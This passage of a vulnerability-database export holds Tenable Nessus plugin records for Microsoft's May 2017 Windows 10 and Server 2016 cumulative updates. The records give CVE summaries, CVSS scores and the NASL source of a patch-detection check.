disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", 